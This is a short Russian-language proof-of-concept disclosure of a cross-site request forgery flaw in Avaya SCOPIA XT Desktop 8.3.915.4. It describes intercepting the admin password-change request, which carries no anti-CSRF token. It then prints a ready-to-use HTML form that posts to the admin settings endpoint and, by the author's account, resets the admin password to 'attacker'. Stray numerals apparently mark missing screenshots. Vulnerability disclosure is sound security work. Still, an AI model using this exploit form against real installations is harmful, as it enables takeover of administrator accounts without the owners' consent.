
Доказательство концепции, демонстрирующее межсайтовую подделку запроса (CSRF) в Avaya SCOPIA XT Desktop, позволяющее сменить пароль администратора без anti-CSRF токена.
В данном PoC будет описано, как эксплуатировать межсайтовую подделку запроса (CSRF) в SCOPIA XT Desktop версии 8.3.915.4
сайт: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1
Межсайтовая подделка запроса, также известная как атака в один клик или session riding и сокращённо обозначаемая как CSRF или XSRF, — это тип вредоносной атаки на веб-сайт, при которой от пользователя, которому доверяет веб-приложение, передаются несанкционированные команды.
На странице «Directory and Authentication» администратор может изменить свой пароль.
Перехватив запрос с помощью Burp Suite, я обнаружил, что анти-CSRF токен не реализован, а единственным механизмом безопасности является сессионный cookie.
6
Я создал этот HTML-файл, который послужил PoC для эксплуатации представленной уязвимости.
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
При запуске в браузере с действительным cookie для среды администрирования SCOPIA XT Desktop удалось изменить пароль пользователя admin на «attacker»:
4
5